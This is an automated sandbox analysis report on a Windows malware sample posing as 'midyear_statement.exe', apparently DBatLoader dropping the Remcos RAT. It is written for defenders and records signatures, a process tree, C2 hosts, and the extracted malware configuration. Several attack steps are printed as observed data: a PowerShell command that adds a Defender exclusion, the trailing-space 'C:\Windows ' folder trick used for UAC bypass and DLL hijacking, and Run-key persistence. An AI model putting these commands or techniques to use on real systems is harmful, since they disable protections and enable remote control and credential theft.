Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
midyear_statement.exe

Overview

General Information

Sample name:midyear_statement.exe
Analysis ID:1417015
MD5:dd8e3f6ac5c24960b3a69490082c60e1
SHA1:c5f8aaec5baa571791789dd5fac53e27938dbc29
SHA256:15db18392d7bbf15b30e528db05ec306e00ac3227277d0639064ec3e2bc98c73
Tags:exe
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: TrustedPath UAC Bypass Pattern
Snort IDS alert for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • midyear_statement.exe (PID: 6428 cmdline: "C:\Users\user\Desktop\midyear_statement.exe" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • cmd.exe (PID: 3632 cmdline: cmd /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 700 cmdline: cmd /c mkdir "\\?\C:\Windows \System32" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 3632 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7520 cmdline: cmd /c "C:\Windows \System32\2506803.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 2506803.exe (PID: 7572 cmdline: "C:\Windows \System32\2506803.exe" MD5: 231CE1E1D7D98B44371FFFF407D68B59)
        • cmd.exe (PID: 7588 cmdline: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 7640 cmdline: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • powershell.exe (PID: 7692 cmdline: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
              • WmiPrvSE.exe (PID: 8068 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • extrac32.exe (PID: 7876 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\midyear_statement.exe C:\\Users\\Public\\Libraries\\Dhuirrkw.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • wkrriuhD.pif (PID: 7896 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 8172 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\jshsresovzeecssjzbcdvgiytb" MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 8184 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\tumlrwcijhwjehgnqmoeyldobicnm" MD5: C116D3604CEAFE7057D77FF27552C215)
      • wkrriuhD.pif (PID: 1648 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif /stext "C:\Users\user\AppData\Local\Temp\vozespnjxpoopncrzwbyjypxcpmofmxl" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Dhuirrkw.PIF (PID: 7544 cmdline: "C:\Users\Public\Libraries\Dhuirrkw.PIF" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • wkrriuhD.pif (PID: 7860 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Dhuirrkw.PIF (PID: 6044 cmdline: "C:\Users\Public\Libraries\Dhuirrkw.PIF" MD5: DD8E3F6AC5C24960B3A69490082C60E1)
    • wkrriuhD.pif (PID: 1652 cmdline: C:\Users\Public\Libraries\wkrriuhD.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0", "Assigned name": "vista", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-W5UGP5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1190782910.000000007FD60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
      00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000000.00000002.1367518233.00000000040A1000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
          00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 49 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.midyear_statement.exe.2656dc8.0.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                0.2.midyear_statement.exe.2a46bd8.2.raw.unpackJoeSecurity_DBatLoaderYara detected DBatLoaderJoe Security
                  24.2.wkrriuhD.pif.5919e2.1.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                    24.2.wkrriuhD.pif.5919e2.1.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                      24.2.wkrriuhD.pif.5919e2.1.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                      • 0x6aaa8:$a1: Remcos restarted by watchdog!
                      • 0x6b020:$a3: %02i:%02i:%02i:%03i
                      Click to see the 90 entries

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: TrustedPath UAC Bypass Pattern
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\2506803.exe", CommandLine: "C:\Windows \System32\2506803.exe", CommandLine|base64offset|contains: , Image: C:\Windows \System32\2506803.exe, NewProcessName: C:\Windows \System32\2506803.exe, OriginalFileName: C:\Windows \System32\2506803.exe, ParentCommandLine: cmd /c "C:\Windows \System32\2506803.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7520, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\2506803.exe", ProcessId: 7572, ProcessName: 2506803.exe
                      Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetFilename: C:\Windows \System32\netutils.dll
                      Sigma detected: Execution from Suspicious Folder
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wkrriuhD.pif, NewProcessName: C:\Users\Public\Libraries\wkrriuhD.pif, OriginalFileName: C:\Users\Public\Libraries\wkrriuhD.pif, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, ProcessName: wkrriuhD.pif
                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Dhuirrkw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhuirrkw
                      Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7588, ParentProcessName: cmd.exe, ProcessCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7640, ProcessName: cmd.exe
                      Sigma detected: Suspicious Program Location with Network Connections
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 192.3.109.132, DestinationIsIpv6: false, DestinationPort: 4445, EventID: 3, Image: C:\Users\Public\Libraries\wkrriuhD.pif, Initiated: true, ProcessId: 7896, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49708
                      Sigma detected: CurrentVersion Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Dhuirrkw.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\midyear_statement.exe, ProcessId: 6428, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Dhuirrkw
                      Sigma detected: Execution of Suspicious File Type Extension
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\wkrriuhD.pif, NewProcessName: C:\Users\Public\Libraries\wkrriuhD.pif, OriginalFileName: C:\Users\Public\Libraries\wkrriuhD.pif, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, ProcessName: wkrriuhD.pif
                      Sigma detected: Powershell Defender Exclusion
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7588, ParentProcessName: cmd.exe, ProcessCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7640, ProcessName: cmd.exe
                      Sigma detected: Uncommon Svchost Parent Process
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 3632, ProcessName: svchost.exe
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , CommandLine|base64offset|contains: )f, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7640, ParentProcessName: cmd.exe, ProcessCommandLine: powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" , ProcessId: 7692, ProcessName: powershell.exe
                      Sigma detected: Windows Processes Suspicious Parent Directory
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\midyear_statement.exe", ParentImage: C:\Users\user\Desktop\midyear_statement.exe, ParentProcessId: 6428, ParentProcessName: midyear_statement.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc, ProcessId: 3632, ProcessName: svchost.exe

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\Public\Libraries\wkrriuhD.pif, ProcessId: 7896, TargetFilename: C:\ProgramData\remcos\logs.dat

                      Snort Signatures

                      Timestamp:03/28/24-13:59:15.069542
                      SID:2032776
                      Source Port:49708
                      Destination Port:4445
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:03/28/24-14:01:41.205303
                      SID:2032777
                      Source Port:4445
                      Destination Port:49708
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for URL or domain
                      Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                      Found malware configuration
                      Source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "xwww.zuckdgreb.duckdns.org:4445:0", "Assigned name": "vista", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-W5UGP5", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for dropped file
                      Source: C:\Users\Public\Libraries\Dhuirrkw.PIFReversingLabs: Detection: 26%
                      Source: C:\Windows \System32\netutils.dllReversingLabs: Detection: 75%
                      Multi AV Scanner detection for submitted file
                      Source: midyear_statement.exeReversingLabs: Detection: 26%
                      Source: midyear_statement.exeVirustotal: Detection: 31%Perma Link
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3664888730.0000000013EEF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.1622995189.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001245D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.000000001248D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589543498.000000002427B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3664577079.00000000124A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1658571409.00000000244BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_12363837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,24_2_12363837
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 27_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,27_2_00404423
                      Source: wkrriuhD.pifBinary or memory string: -----BEGIN PUBLIC KEY-----

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000021.00000002.1638093919.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.1566851721.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7896, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 7860, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wkrriuhD.pif PID: 1652, type: MEMORYSTR

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Users\Public\Libraries\wkrriuhD.pifCode function: 24_2_123374FD _wcslen,CoGetObject,24_2_123374FD

                      Compliance

                      barindex
